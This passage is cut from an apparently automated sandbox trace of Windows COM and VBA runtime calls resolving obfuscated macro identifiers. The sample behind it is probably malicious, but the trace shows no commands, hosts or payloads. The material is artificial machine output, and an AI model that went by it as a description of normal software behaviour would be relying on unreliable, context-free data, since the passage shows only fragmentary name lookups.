szNameBuf="kXAA1CA", lHashVal=0x10a68d, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.726] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.726] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.726] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="kXAA1CA", lHashVal=0x10a68d, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.726] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.726] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.726] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="kXAA1CA", lHashVal=0x10a68d, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.726] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.726] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81b1e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="kXAA1CA") returned 8 [0069.726] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="kXAA1CA", lHashVal=0x10a68d, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.726] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.726] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3b81b1e | out: _Dst=0x67c2d40) returned 0x0 [0069.726] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_kXAA1CA") returned 0x10aa11 [0069.726] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_kXAA1CA" | out: _Dst="_B_var_kXAA1CA") returned 0x0 [0069.726] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_kXAA1CA") returned 15 [0069.726] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.726] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_kXAA1CA", lHashVal=0x10aa11, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.726] IUnknown:Release (This=0x665ba50) returned 0xd [0069.726] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.726] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_kXAA1CA", lHashVal=0x10aa11, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.726] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.726] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.727] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_kXAA1CA", lHashVal=0x10aa11, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.727] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.727] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.727] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_kXAA1CA", lHashVal=0x10aa11, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.727] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.727] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.727] IUnknown:Release (This=0x665ba50) returned 0xd [0069.727] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa870e5e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_kXAA1CA") returned 15 [0069.727] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_kXAA1CA", lHashVal=0x10aa11, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x6b005f00720061, ppTypeComp=0x31004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x6b005f00720061, ppTypeComp=0x31004100000000, pDummy=0x0) returned 0x0 [0069.727] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b81b1e | out: _Dst=0x144ec0) returned 0x0 [0069.727] ITypeComp:RemoteBind (in: This=0x665ba60, szName="Uxk4_AZA", lHashVal=0x10ae74, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.727] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81b6e, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="Uxk4_AZA") returned 9 [0069.727] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="Uxk4_AZA", lHashVal=0x10ae74, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.727] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81b6e, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="Uxk4_AZA") returned 9 [0069.727] ITypeComp:RemoteBind (in: This=0x665bd30, szName="Uxk4_AZA", lHashVal=0x10ae74, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.727] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Uxk4_AZA") returned 0x10ae74 [0069.727] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="Uxk4_AZA" | out: _Dst="Uxk4_AZA") returned 0x0 [0069.727] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="Uxk4_AZA") returned 9 [0069.727] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.727] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="Uxk4_AZA", lHashVal=0x10ae74, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.727] IUnknown:Release (This=0x665ba50) returned 0xd [0069.727] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.727] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="Uxk4_AZA", lHashVal=0x10ae74, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.728] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.728] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.728] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="Uxk4_AZA", lHashVal=0x10ae74, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.728] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.728] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.728] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="Uxk4_AZA", lHashVal=0x10ae74, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.728] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.728] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81b6e, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="Uxk4_AZA") returned 9 [0069.728] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="Uxk4_AZA", lHashVal=0x10ae74, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.728] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.728] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3b81b6e | out: _Dst=0x67c2d40) returned 0x0 [0069.728] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Uxk4_AZA") returned 0x1085fd [0069.728] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="TZxACC4", cchCount1=-1, lpString2="_B_var_Uxk4_AZA", cchCount2=-1) returned 3 [0069.728] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_Uxk4_AZA" | out: _Dst="_B_var_Uxk4_AZA") returned 0x0 [0069.728] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_Uxk4_AZA") returned 16 [0069.728] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.728] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_Uxk4_AZA", lHashVal=0x1085fd, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.728] IUnknown:Release (This=0x665ba50) returned 0xd [0069.728] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.728] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_Uxk4_AZA", lHashVal=0x1085fd, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.728] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.728] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.728] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_Uxk4_AZA", lHashVal=0x1085fd, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.728] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.728] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.728] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_Uxk4_AZA", lHashVal=0x1085fd, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.728] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.729] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.729] IUnknown:Release (This=0x665ba50) returned 0xd [0069.729] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa870e8e, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_Uxk4_AZA") returned 16 [0069.729] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_Uxk4_AZA", lHashVal=0x1085fd, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x55005f00720061, ppTypeComp=0x5f003400000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x55005f00720061, ppTypeComp=0x5f003400000000, pDummy=0x0) returned 0x0 [0069.729] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b81b6e | out: _Dst=0x144ec0) returned 0x0 [0069.729] ITypeComp:RemoteBind (in: This=0x665ba60, szName="HXoAx4", lHashVal=0x10e40a, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.729] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81b46, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="HXoAx4") returned 7 [0069.729] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="HXoAx4", lHashVal=0x10e40a, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.729] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81b46, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="HXoAx4") returned 7 [0069.729] ITypeComp:RemoteBind (in: This=0x665bd30, szName="HXoAx4", lHashVal=0x10e40a, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.729] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="HXoAx4") returned 0x10e40a [0069.729] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="HXoAx4" | out: _Dst="HXoAx4") returned 0x0 [0069.729] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="HXoAx4") returned 7 [0069.729] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.729] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="HXoAx4", lHashVal=0x10e40a, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.729] IUnknown:Release (This=0x665ba50) returned 0xd [0069.729] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.729] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="HXoAx4", lHashVal=0x10e40a, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.729] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.729] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.729] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="HXoAx4", lHashVal=0x10e40a, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.729] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.730] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.730] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="HXoAx4", lHashVal=0x10e40a, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.730] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.730] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81b46, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="HXoAx4") returned 7 [0069.730] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="HXoAx4", lHashVal=0x10e40a, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.730] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.730] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3b81b46 | out: _Dst=0x67c2d40) returned 0x0 [0069.730] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_HXoAx4") returned 0x105e74 [0069.730] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_HXoAx4" | out: _Dst="_B_var_HXoAx4") returned 0x0 [0069.730] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_HXoAx4") returned 14 [0069.730] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.730] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_HXoAx4", lHashVal=0x105e74, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.730] IUnknown:Release (This=0x665ba50) returned 0xd [0069.730] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.730] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_HXoAx4", lHashVal=0x105e74, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.730] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.730] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.730] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_HXoAx4", lHashVal=0x105e74, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.730] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.730] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.731] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_HXoAx4", lHashVal=0x105e74, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.731] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.731] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.731] IUnknown:Release (This=0x665ba50) returned 0xd [0069.731] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa870ebe, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_HXoAx4") returned 14 [0069.731] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_HXoAx4", lHashVal=0x105e74, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x48005f00720061, ppTypeComp=0x78004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x48005f00720061, ppTypeComp=0x78004100000000, pDummy=0x0) returned 0x0 [0069.731] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b81b46 | out: _Dst=0x144ec0) returned 0x0 [0069.731] ITypeComp:RemoteBind (in: This=0x665ba60, szName="FBQoQAQ", lHashVal=0x102476, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.731] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81bc2, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="FBQoQAQ") returned 8 [0069.731] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="FBQoQAQ", lHashVal=0x102476, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.731] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81bc2, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="FBQoQAQ") returned 8 [0069.731] ITypeComp:RemoteBind (in: This=0x665bd30, szName="FBQoQAQ", lHashVal=0x102476, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.731] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="FBQoQAQ") returned 0x102476 [0069.731] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="FBQoQAQ" | out: _Dst="FBQoQAQ") returned 0x0 [0069.732] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="FBQoQAQ") returned 8 [0069.732] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.732] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="FBQoQAQ", lHashVal=0x102476, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.732] IUnknown:Release (This=0x665ba50) returned 0xd [0069.732] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.732] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="FBQoQAQ", lHashVal=0x102476, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.732] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.732] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.732] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="FBQoQAQ", lHashVal=0x102476, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.732] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.732] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.732] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="FBQoQAQ", lHashVal=0x102476, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.732] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.732] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81bc2, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="FBQoQAQ") returned 8 [0069.732] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="FBQoQAQ", lHashVal=0x102476, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.732] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.732] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3b81bc2 | out: _Dst=0x67c2d40) returned 0x0 [0069.732] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_FBQoQAQ") returned 0x101879 [0069.732] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="fXcAoAAU", cchCount1=-1, lpString2="_B_var_FBQoQAQ", cchCount2=-1) returned 3 [0069.732] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_FBQoQAQ" | out: _Dst="_B_var_FBQoQAQ") returned 0x0 [0069.732] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_FBQoQAQ") returned 15 [0069.732] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.732] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_FBQoQAQ", lHashVal=0x101879, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.732] IUnknown:Release (This=0x665ba50) returned 0xd [0069.732] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.732] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_FBQoQAQ", lHashVal=0x101879, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.732] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.732] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.733] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_FBQoQAQ", lHashVal=0x101879, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.733] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.733] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.733] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_FBQoQAQ", lHashVal=0x101879, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.733] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.733] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.733] IUnknown:Release (This=0x665ba50) returned 0xd [0069.733] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa870eee, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_FBQoQAQ") returned 15 [0069.733] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_FBQoQAQ", lHashVal=0x101879, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x46005f00720061, ppTypeComp=0x51006f00000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x46005f00720061, ppTypeComp=0x51006f00000000, pDummy=0x0) returned 0x0 [0069.733] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b81bc2 | out: _Dst=0x144ec0) returned 0x0 [0069.733] ITypeComp:RemoteBind (in: This=0x665ba60, szName="wBwGADU", lHashVal=0x1058b8, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.733] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81bea, cbMultiByte=8, lpWideCharStr=0x144d40, 